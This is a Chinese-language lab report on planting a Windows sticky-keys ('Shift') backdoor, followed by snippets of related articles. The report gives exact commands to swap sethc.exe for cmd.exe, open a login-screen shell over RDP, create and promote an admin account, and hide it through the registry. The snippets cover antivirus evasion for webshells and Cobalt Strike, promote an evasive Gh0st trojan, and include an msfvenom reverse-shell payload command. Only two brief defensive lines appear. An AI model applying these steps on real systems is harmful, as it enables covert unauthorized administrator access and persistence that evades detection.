创建shift后门

article/2025/9/24 0:31:54

一、实验目的及要求

1. 学会创建Shift后门

2.掌握shift后门的原理

 

二、实验设备(环境)及要求

   PC机, VC++等,虚拟云平台

三、实验内容与步骤

1.在192.168.1.3的虚拟机上打开cmd命令指示符;

2.输入“ cd  c:\WINDOWS\system32”,进入该文件夹;

3.输入“move sethc.exe sethc.exe.bak”,对“sethc.exe”进行备份;

4.输入“copy cmd.exe sethc.exe”,对cmd.exe进行复制并更名为“sethc.exe”;

5.打开控制面板-> 辅助功能选项->勾选“使用粘滞键”,点击应用;

6.打开192.168.1.2的虚拟机,打开运行,输入“mstsc”打开远程登录程序;

7.输入“192.168.1.3”,点击连接;

8.当出现登录界面时,按5下shift键可进入目标机的cmd中;

9.在cmd中输入“net user hack 123 /add”,创建用户;

10.接下来输入“net localgroup administrators hack /add”和“net user hack /active:yes”,对hack用户进行提权和激活;

11.用hack用户登录目标机。

 

 

四、实验结果与数据处理

1.对192.168.1.3的虚拟机的命令操作

 

 

 

2.使用粘滞键

 

 

 

 

3.用192.168.1.2的虚拟机远程登录192.168.1.3的虚拟机时,创建用户。并对其进行提权和激活

 

 

 

 

4.成功登录目标机

 

 

 

 

 

 

 

 

五、分析与讨论

  1.本实验是利用在应用“使用粘滞键”后,windows系统在按5次shift后会调用“sethc.exe”应用程序的原理,将cmd.exe复制并更名为“sethc.exe”,然后替换掉原有的sethc.exe文件,这样在登陆界面的时候我们连续按下5吃shift键系统就会运行cmd.exe,这样我们就可以对目标机进行创建用户,对用户进行相关提权和激活,从而进入目标机。

  2.防范措施:

(1)禁用shift键的粘滞功能;

(2)设置权限,让任何用户都无法访问和修改“sethc.exe”文件。

3.如何创建隐藏用户:

  创建用户后,按win+r,输入regedit回车,把注册表放到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList,在里面创建一个dword值,命名为你要隐藏的用户名,数值0。


http://chatgpt.dhexx.cn/article/BdNXSHX8.shtml

相关文章

Windows留置后门——隐藏用户+Shift后门

文章目录 前言一、创建隐藏用户1. 创建用户2. 隐藏账号 二、Shift后门1. 后门制作2. 防御 总结 前言 后门是攻击者出入系统的通道,惟其如此它隐蔽而危险,攻击者利用后门技术如入无人之境 一、创建隐藏用户 1. 创建用户 1.1、攻击者控制某台机器&#…

3389之永不查杀的后门shift后门代码

永不查杀的3389后门其原理就是利用shift后门,连敲5次shift键既可以直接进入服务器。 前些天在群里有个小伙伴问了一句谁知道shift后门的代码,当时我给了他一个链接,我总是觉得这个百度下就能找到吧,我查了一下,发现什么…

windows权限维持之shift后门

原理:沾滞键的目的是为了帮助那些按键有困难的人设计的,在Windows系统下连续按5次shift键后,系统就会执行C:\Windows\System32下的sethc.exe,也就是启用了沾滞键,但是当我们将shell.exe文件把sethc.exe文件通过更改名称…

RDP shift后门漏洞

RDP shift后门漏洞 在win7开机过程中,强制关闭计算机,再次开机会出现修复,点启动修复 当它无法修复时会弹出下面的框发送和不发送,这里有查看问题详细信息的按钮 点击该按钮可以看到有一些信息 在信息最下面有个隐私声明的…

mstsc之shift后门

我们在3389的时候,winserver03之后,验证端都放在了本地,mstsc无法进入锁屏界面,也就无法使用shifts后门 这里我们可以降低本地rdp客户端的版本,也可以在目标机器上做如下设置: 第一个是设置远程桌面连接的…

沾滞键shift后门

目录 1. 简介 2. 后门原理 3. 后门制作 3.1 方法一 cmd覆盖sethc 3.2 方法二 利用注册表修改沾滞键快捷方式 4. shift后门利用 1. 简介 沾滞键的目的是为了帮助那些按键有困难的人设计的,在Windows系统下连续按5次shift键后,系统就会执行system32下…

shift后门

参考:https://blog.csdn.net/qq_43626025/article/details/122031653 shift后门 替换C:\windows\system32\sethc.exe为你想要启动的后门程序,这里替换为我们用最常见的cmd.exe。 这里要注意下,默认情况下我们需要先改变sethc的所有者&#x…

④开启shift后门实验报告

班级 计科1班 姓名 彭彭头 学号 时间 2022.05.13 成绩 实验项目名称 开启shift后门 实验目的 1、了解常用入侵主机的方法 2、掌握操作系统常见漏洞,并学会防范 实验内容 利用Windows7系统的shift漏洞,开启后门。 实验环境 操作系统&a…

Windows留后门--教程(五)——shift粘贴键后门

一、shift粘贴键后门介绍 Shift粘滞键是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞键,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。所以攻击者很有可能通过篡改这些辅助功能的指向程序来…

后门之shift后门制作及修复方法

一、如何制作shift后门 方法1 在cmd窗口,敲打命令如下: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe attrib c:\windows\system32\sethc.exe h attr…

警惕免杀版Gh0st木马!

https://github.com/SecurityNo1/Gh0st2023 经过调查发现,这款开源的高度免杀版Gh0st木马目前正在大范围传播,据称可免杀多种主流杀软:开发者不仅制作了新颖的下载页面,还设法增加了搜索引擎的收录权重,吸引了许多免…

PHP之一句话木马免杀

目录 免杀小技巧 1.字符串拼接方式&#xff0c;构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式&#xff0c;构造敏感函数。 <?php $a ass; $b er; $c t…

MSF(2)——各种木马的生成及简单的免杀

本专栏是笔者的网络安全学习笔记&#xff0c;一面分享&#xff0c;同时作为笔记 文章目录 前文链接木马生成免杀php 免杀Python 免杀分析木马文件编写免杀马打包exe 前文链接 WAMP/DVWA/sqli-labs 搭建burpsuite工具抓包及Intruder暴力破解的使用目录扫描&#xff0c;请求重发…

PHP一句话木马免杀

作者&#xff1a;小刚 一位苦于信息安全的萌新小白帽&#xff0c;记得关注给个赞&#xff0c;谢谢 本实验仅用于信息防御教学&#xff0c;切勿用于其它用途 PHP木马免杀小技巧 免杀小技巧1.字符串拼接方式&#xff0c;构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用…

一句话木马及免杀

这篇文章主要是总结一句话木马&#xff0c;并实现一句话木马的简单免杀&#xff0c;以及一个不死马的实现。 文章目录 一句话木马及原理一句话木马简单免杀一、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、写入木马 不死马 一句话木马及原理 首…

cobalt strike木马免杀

0x001-针对powershell免杀 工具&#xff1a;Invoke-Obfuscation 操作实例&#xff1a; 1、利用CS生成powershell木马 2、进入invoke-Obsfuscation文件&#xff0c;使用powershell命令执行 3、利用powershell命令执行免杀后的ps1文件&#xff0c;成功上线 0x002 -针…

一句话木马以及免杀

此篇只讨论php&#xff0c;其实原理是相同的&#xff0c;本文的思路依然适用于其他语言 WAF一般都是维护一个规则库&#xff0c;记录webshell常用的函数、方法等等&#xff0c;通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警&#xff0c;但是规则匹配肯定会…

Python木马分离免杀(下载分离型)

渗透环境&#xff1a; 目标主机&#xff1a;win10-192.168.159.133-杀软360、火绒、微步云沙盒 攻击主机&#xff1a;kali-192.168.159.129 使用工具&#xff1a;msfconsole、pyinstaller、pycharm 木马制作过程&#xff1a; 1、msfconsole的msfvenom模块生成shellcode k…

关于木马免杀的一些方法

一、免杀简述 ​ 理论上讲&#xff0c;免杀⼀定是出现在杀毒软件之后的。⽽通过杀毒软件的发展史不难知 道&#xff0c;第⼀款杀毒软件 kill 1.0是Wish公司1987年推出的&#xff0c;也就是说免杀技术⾄少是在 1989年以后才发展起来的。 ​ 1989年&#xff1a;第⼀款杀毒软件M…

MSF木马的免杀(三)

目录 MSF木马的免杀 C/C加载免杀 加图标 MSF木马的免杀 MSF下输入下列命令&#xff0c;生成免杀shellcode msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOSTx.x.x.x LPORT8888 -e x86/shikata_ga_nai -i 15 -b \x00\ PrependMigratetrue Pre…